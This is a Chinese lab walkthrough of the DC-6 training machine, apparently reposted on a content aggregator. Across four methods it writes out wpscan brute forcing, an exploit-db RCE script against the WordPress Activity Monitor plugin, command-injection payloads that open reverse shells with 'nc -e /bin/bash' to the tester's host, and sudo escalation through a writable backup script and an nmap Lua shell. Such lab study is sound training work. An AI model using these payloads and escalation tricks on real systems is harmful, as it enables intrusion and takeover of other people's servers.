DC-6靶机渗透测试

2023-11-09

DC-6靶机渗透测试

方式一

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230811190850967

1.2 端口扫描

nmap -sS -p- 192.168.188.176

image-20230811190902487

访问web页面

image-20230811190704425

发现没有反应,之前在DC-2中遇到过这种情况需要改hosts文件。

打开配置文件

vim /etc/hosts 

配置如下信息

192.168.188.176 wordy

image-20230811192424662

然后重新启动服务即可访问页面。

image-20230811192516845

1.3 目录扫描

dirsearch -u 192.168.188.176 -e * -i 200

image-20230811192843743

访问后台页面

http://wordy/wp-login.php  

image-20230811192940664

2. 暴力破解

使用cewl生成密码字典

cewl -w password.txt http://wordy/

image-20230811193415744

使用wpscan暴力枚举用户名

wpscan --url http://wordy/ -e

image-20230811193618460

然后将这五个用户名放在一个字典中,进行爆破

wpscan --url http://wordy/ -U user.txt -P password.txt

发现无法爆破出来。

查看DC-6作者的提示

image-20230811195729026

image-20230811195837964

解压指定文件

gunzip rockyou.txt.gz

说明gunzip 是一个用于解压缩.gz文件的命令行工具。

image-20230811195939865

然后切换到tmp目录下生成密码字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic 

image-20230811200331264

将之前创建的用户名字典移动到tmp目录下,然后进行爆破

wpscan --url http://wordy/ -U user.txt -P wordy-pass1.dic

image-20230811200814379

用户名:mark,密码:helpdesk01进行登录。

登录成功

image-20230811200934431

页面发现

image-20230811201151447

3. 漏洞利用

发现了Activity monitor这个插件(远程命令执行漏洞)

Activity Monitor,官方解释为:(活动监视器)即实时显示CPU、内存和网络的使用情况,记录由虚拟内存大小测量的系统负载。用一句大白话来说,Activity Monitor类似Windows中的任务管理器,可以实时查看进程占用的CPU、内存的使用量。

使用searchsploit进行漏洞查找

searchsploit activity monitor 

image-20230811211225589

查看漏洞的绝对路径

searchsploit -p php/webapps/50110.py

image-20230811211326448

/usr/share/exploitdb/exploits/php/webapps/50110.py

用python执行这个脚本

python3 /usr/share/exploitdb/exploits/php/webapps/50110.py

依次输入靶机的IP地址,爆破出来的用户名及密码。

image-20230811211623558

4. 提权

开启一个新终端监听6666端口

image-20230811211801402

然后在刚才的终端里输入反弹shell

nc -e /bin/bash 192.168.188.157 6666

image-20230811211847865

使用python交互shell

python  -c "import pty;pty.spawn('/bin/bash')"

image-20230811211915533

找到mark用户的家目录下的stuff文件夹,查看里面的things-to-do.txt。

image-20230811212146775

提示添加了新用户:graham - GSo7isUM1D4。切换用户:

su graham

image-20230811212320637

查询graham用户的root权限指令:sudo -l,看到jens目录下有bash脚本。

image-20230811212351126

切换到jens的家目录查看脚本文件backup.sh

image-20230811212541465

该脚本的内容是压缩备份Web的文件。那么我们是否可以在脚本里面添加代码,这样在执行脚本的时候可以打开一个shell。

追加写入:echo "/bin/bash" >> backups.sh,意味着它会打开一个shell(此处会打开jens用户的shell)。

image-20230811212830530

该脚本在jens的家目录下所以使用jens的身份执行该脚本:sudo -u jens /home/jens/backups.sh,切换成功。

说明-u以指定的用户作为新的身份。

同时查看jens的可执行哪些命令的权限,发现有nmap。

image-20230811212956177

查看nmap的sudo提权方式

nmap | GTFOBins

image-20230811213109832

使用a方法依次输入即可

image-20230811213304103

进入root根目录,找到theflag.txt,渗透成功。

image-20230811213328337

方式二

1. 漏洞利用

发现了Activity monitor这个插件后,使用使用searchsploit进行漏洞查找。

searchsploit activity monitor 

image-20230812104844565

将45274.html复制到桌面上进行修改

image-20230812105113603

kali监听4444端口

nc -lvp 4444

image-20230812105311815

再开启一个临时http服务端口为8888

python3 -m http.server 8888

image-20230812105437367

浏览器访问一下kali开启的http服务。

192.168.188.157:8888

image-20230812105510733

点击Submit request

反弹成功

image-20230812105618224

进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现是graham用户及登录密码。

image-20230812105819491

使用ssh远程登录

image-20230812105925570

查看一下当前用户可以执行的操作,发现可以运行jens用户家目录下面的backups.sh脚本

image-20230812110055445

查看jens家目录下的这个文件,发现是对web的文件进行打包备份

image-20230812110116859

追加写入:echo "/bin/bash" >> backups.sh。并指定jens的身份来执行该脚本。

脚本执行成功后,切换到jens用户,查看jens可以执行的操作 。

image-20230812110418085

发现nmap提权提示操作。通过查询nmap | GTFOBins,来进行提权即可。

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap --script=getShell

# 查找flag
cat /root/theflag.txt

image-20230812111112062

提权命令说明

命令 echo 'os.execute("/bin/sh")' > getShell 是一条用于创建一个名为 getShell 的文件,并将其中的内容设置为 'os.execute("/bin/sh")' 的命令。下面对这个命令进行详细解析:

  • echo:是一个命令行工具,用于将指定的字符串输出到标准输出(通常是终端)。
  • 'os.execute("/bin/sh")':是一个 Lua 语言中的表达式,表示执行一个操作系统命令 /bin/sh(即交互式 Shell)。
  • >:是一个重定向操作符,用于将命令的输出重定向到指定的文件。
  • getShell:是要创建的文件名,也可以是文件的路径。

因此,该命令的作用是将 'os.execute("/bin/sh")' 这个命令写入名为 getShell 的文件中。

getShell 文件内容为:

os.execute("/bin/sh")

当执行这个文件时,将会执行 "/bin/sh" 这个命令,从而打开一个交互式 Shell。这意味着,在执行 getShell 文件后,将进入一个可以执行命令的 Shell 环境。

该命令 sudo nmap --script=getShell 是使用 nmap 工具执行 getShell 脚本的命令。下面对这个命令进行详细解析:

  • sudo:是一个命令行工具,用于以超级用户(root)权限执行指定的命令。sudo和SUID详解
  • nmap:是一款网络探测和安全扫描工具,用于扫描主机和网络服务。
  • --script=getShell:是 nmap 命令的参数,指定要运行的脚本名称为 getShell

方式三

1. 漏洞利用

在登录后发现了Activity monitor这个插件

Activity Monitor,官方解释为:(活动监视器)即实时显示CPU、内存和网络的使用情况,记录由虚拟内存大小测量的系统负载。用一句大白话来说,Activity Monitor类似Windows中的任务管理器,可以实时查看进程占用的CPU、内存的使用量。

image-20230812102441572

输入127.0.0.1测试一下

image-20230812102907482

这里既然能解析ip地址,是否也能解析命令如127.0.0.1&ls。

image-20230812102812952

发现确实是远程命令执行漏洞,利用这个漏洞来反弹shell。输入框输入如下命令:

127.0.0.1|nc -e /bin/bash 192.168.188.157 9999

这里它的输入框有限制输入长度,可以查看源代码在检查里修改它的长度,将其修改为100。

image-20230812103525426

image-20230812103627109

kali中监听9999端口

image-20230812103542530

点击页面上的Lookup,反弹成功。

image-20230812103646195

然后设置交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20230812103745218

然后接下来解释提权了,和方式一的方法一样。

方式四

1. 漏洞利用

利用Activity monitor这个插件,在发送数据的时候使用bp抓包来修改。

页面输入127.0.0.1后在bp中修改抓取到的数据包,修改为127.0.0.1|ls,成功显示。

image-20230812104338642

然后修改数据包为127.0.0.1|nc -e /bin/bash 192.168.188.157 6666

image-20230812104618499

并且kali反弹成功,设置交互式shell

image-20230812104552240

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

DC-6靶机渗透测试 的相关文章

随机推荐

  • python multiprocessing 报错cannot pickle ‘_io.TextTOWrapper‘ object

    一 报错TypeError cannot pickle io TextTOWrapper object 在使用多进程时报错 错误信息 TypeError cannot pickle io TextTOWrapper object 1 1 原
  • c盘满了怎么办?如何快速清理内存(6个方法)

    很多用户都会问 我的电脑c盘东西太多了 c盘满了怎么办 c盘爆满 可能还会收到系统提示磁盘空间不足的警告 当出现这种情况 会导致电脑很多应用无法正常运行 运行速度也会大大降低 该如何解决这个问题 不如来看看小编精心整理的关于如何清理c盘垃圾
  • antV使用教程入门

    在移动端使用antV F2图表入门介绍 1 通过npm安装 npm install antv f2 save 成功安装完成之后 即可使用 import 或 require 进行引用 const F2 require antv f2 2 通过
  • 剑指 Offer 14- I. 剪绳子 数学法+动态规划

    剑指 Offer 14 I 剪绳子 难度 中等 题目描述 解题思路 1 数学方法 记不清在哪里好像做过这道题 在所有的分法里 每次以3为一段能得到最大的结果 比如9 分成33的时候是最大的 计算数字除以3的余数 如果余1 就和其中一个三组合
  • DETRs Beat YOLOs on Real-time Object Detection

    目录 1 模型架构 1 1高效混合编码器 1 1 1 尺度内特征交互模块AIFI 1 1 2 跨尺度特征融合CCFM 1 2IoU感知查询选择 总结 DETRs在实时目标检测中击败YOLO 问题 DETR的高计算成本 实时检测效果有待提高
  • ES6之map()方法

    map 方法 map 映射 即原数组映射成一个新的数组 map方法接受一个新参数 这个参数就是将原数组变成新数组的映射关系 function myfun 1 arr var array arr map item gt array push
  • unity2019导入leapmotion插件显示SpatialTracking在unity Engine中缺少相应的头文件

    unity2019导入leapmotion插件显示SpatialTracking在unity Engine中缺少相应的头文件 1 问题描述 2 问题解决方法 1 2 3 插入这个插件 4 问题就可以解决了 注 2019将很多插件需要自己选择
  • RabbitMQ--扩展--10--消息追踪

    RabbitMQ 扩展 10 消息追踪 1 介绍 1 1 RabbitMQ 消息异常丢失的情况 可能是生产者与Broker断开了连接并且也没有任何重试机制 可能是消费者在处理消息时发生了异常 不过却提前进行了ack 可能是交换机并没有与任何
  • js如何实现网站内容禁止复制和粘贴、另存为?

    1 使右键和复制失效 方法1 在网页中加入以下代码 代码如下 方法2 在中加入以下代码
  • 四个复制就能用的炫酷网页特效

    第一个 炫酷星空
  • springboot的基本配置

    server port 8086 spring profiles active dev application name my springsecurity plus datasource driver driver class name
  • 【鸿蒙】日志工具的使用

    鸿蒙 Harmony应用开发 目录导航 在前面 鸿蒙 创建你的第一个Harmony项目我们已经能够顺利的编译并运行我们的第一个程序hello world 为了今后能走的更远 我们现在需要点基础的装备 日志工具 学会了日志工具的使用方法 会对
  • kubectl proxy 命令使用

    kubectl proxy address 192 168 8 220 accept hosts localhost 127 0 0 1 1 accept paths
  • 【语义分割】8、Self-Regulation for Semantic Segmentation

    文章目录 一 背景 二 动机 三 方法 SR F Loss Shallow to Deep SR L Loss Deep to Shallow 四 效果 论文地址 https arxiv org pdf 2108 09702 pdf 代码地
  • Spingboot 多模块引入第三方jar包

    1 在需要的模块中引入jar包 2 在此模块中的pom xml 中引用 3 要想打包部署服务器 需要在启动模块中添加配置信息 ps 启动模块要引用此模块才能将此一起jar打包部署
  • 开源的虚拟化私有云及云管平台

    免费开源的私有云及云管平台来了 除虚拟化外 还支持纳管主流的 9 大公有云及私有云平台 欢迎大家安装体验 能解决哪些问题 将几台物理服务器虚拟化成一个私有云平台 需要一个紧凑而且功能相对完整的物理机全生命周期管理工具 将 VMware vS
  • bottle 文件服务器,python bottle 框架基础教程:文件上传

    文件上传 需要注意的是前端html的form表单中 要添加 enctype multipart form data 属性 否则无法上传文件 在后端 用request files方法 获取到表单传上来的文件 首先把对象赋值给一个变量名 如up
  • Android开发过程中的一些问题

    1 Can t toast on a thread that has not called Looper prepare 就是Android子线程中不能直接使用Toast显示提示信息的问题 加入Looper prepare 和Looper
  • java static 静态方法的使用 注意事项

    定义为 static function1 function1 中不能引用this或super 在android 中这样用的话 会出现以下的报错 W dalvikvm 2783 JNI WARNING instance fieldID 0x5
  • DC-6靶机渗透测试

    文章目录 DC 6靶机渗透测试 方式一 1 信息收集 1 1 主机扫描 1 2 端口扫描 1 3 目录扫描 2 暴力破解 3 漏洞利用 4 提权 方式二 1 漏洞利用 方式三 1 漏洞利用 方式四 1 漏洞利用 DC 6靶机渗透测试 方式一